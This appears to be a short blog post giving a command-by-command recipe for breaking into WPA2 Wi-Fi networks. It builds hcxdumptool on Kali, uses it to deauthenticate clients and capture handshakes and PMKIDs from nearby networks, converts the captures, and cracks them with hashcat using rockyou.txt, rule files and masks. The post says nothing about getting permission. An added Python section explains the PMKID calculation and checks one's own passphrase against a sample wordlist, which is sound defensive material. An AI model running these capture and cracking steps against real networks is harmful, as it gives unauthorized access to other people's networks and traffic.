Wireless Penetration

The wolves are full and sheep intact

Posted without comment (no pun intended)

Don’t try this at home, kids!

Random Musing: this could probably be done on a Pi or similar.


Inside Jokers’ Lair

  • Boot Kali Light

  • As of 2019.03:

    apt-get update && \
    apt-get -y upgrade && \
    apt-get install -y gcc git make \
                       libcurl4-openssl-dev libssl-dev zlib1g-dev
    
    git clone https://github.com/ZerBea/hcxdumptool && \
              cd hcxdumptool && \
              make install
    
    # run for 30 secs to confirm capabilities
    hcxdumptool -i interface --do_rcascan          
    
    # you can add --filterlist=<file> or --ap_mac=<mac_addr>
    # default scan list: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12, 13
    hcxdumptool -i wlp39s0f3u4u5 -o haktheplanet.cap \
                -T 5 -t 90 -D 100 -A 100 \
                --give_up_ap_attacks=10 \
                --give_up_deauthentications=10 \
                --reactive_beacon \
                --enable_status=3 
    
    # convert to usable format(s)
    hcxpcaptool -k haktheplanet.pmkid haktheplanet.cap 
    hcxpcaptool -o haktheplanet.hashcat haktheplanet.cap 
    hcxpcaptool -O haktheplanet.raw.hashcat haktheplanet.cap 

Back At The Bat Cave

  • Hashmode: 2500

    GPU        kH/s
    RX5700XT   474.1
    GTX1070    297.8
    RX580      224.0

  • Use -m 16800 for PMKIDs or -m 2500 for regular hashcats

    curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    
    # low hanging fruit, how does this still work lulz
    hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt --potfile-path haktheplanet.naive.win
    
    # kay time for rules
    hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt -r ./rules/d3ad0ne.rule --potfile-path haktheplanet.deadone.win
    
    # this isnt the slowest
    hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt -r ./rules/rockyou-30000.rule --potfile-path haktheplanet.rocku.win
    
    # dive isnt fast
    hashcat -m 2500 -a 0 haktheplanet.hashcat rockyou.txt -r ./rules/dive.rule --potfile-path haktheplanet.dive.win
    
    # GLHF ¯\_(ツ)_/¯
    hashcat -m 2500 -a 3 haktheplanet.hashcat ./masks/rockyou-1-60.hcmask --potfile-path haktheplanet.mask.win
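
Why the PMKID path (-m 16800) is a purely offline check, and how to audit a passphrase on a network you run: an added Python example, not code from the original post or from the hcx/hashcat projects. The SSID, MAC addresses, passphrases and wordlist are constructed lab values, and `survives_wordlist` is a hypothetical helper name.

```python
import hashlib
import hmac

def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK master key: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def mac_bytes(mac: str) -> bytes:
    """'02:00:00:00:00:01' -> 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"not a MAC address: {mac!r}")
    return raw

def pmkid(passphrase: str, ssid: str, ap_mac: str, sta_mac: str) -> bytes:
    """First 128 bits of HMAC-SHA1(PMK, "PMK Name" | AP MAC | client MAC)."""
    label = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(sta_mac)
    return hmac.new(pmk(passphrase, ssid), label, hashlib.sha1).digest()[:16]

def survives_wordlist(own_passphrase, ssid, ap_mac, sta_mac, wordlist) -> bool:
    """True if no wordlist entry reproduces the PMKID of your own network."""
    target = pmkid(own_passphrase, ssid, ap_mac, sta_mac)
    for word in wordlist:
        if not 8 <= len(word) <= 63:      # outside the WPA2 passphrase length range
            continue
        if hmac.compare_digest(pmkid(word, ssid, ap_mac, sta_mac), target):
            return False
    return True

# Constructed lab values (locally administered MACs, made-up SSID and wordlist).
SSID, AP, STA = "LabNet", "02:00:00:00:00:01", "02:00:00:00:00:02"
WORDLIST = ["password", "12345678", "iloveyou1", "sunshine"]

if __name__ == "__main__":
    for candidate in ("sunshine", "v7#Qm2-rust-Lantern-0419"):
        verdict = "survives" if survives_wordlist(candidate, SSID, AP, STA, WORDLIST) else "falls"
        print(f"{candidate!r}: {verdict} against the sample wordlist")
```

Nothing in the computation needs the access point, so lockouts or rate limits on the AP do not apply; passphrase length and randomness are what the defender controls.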
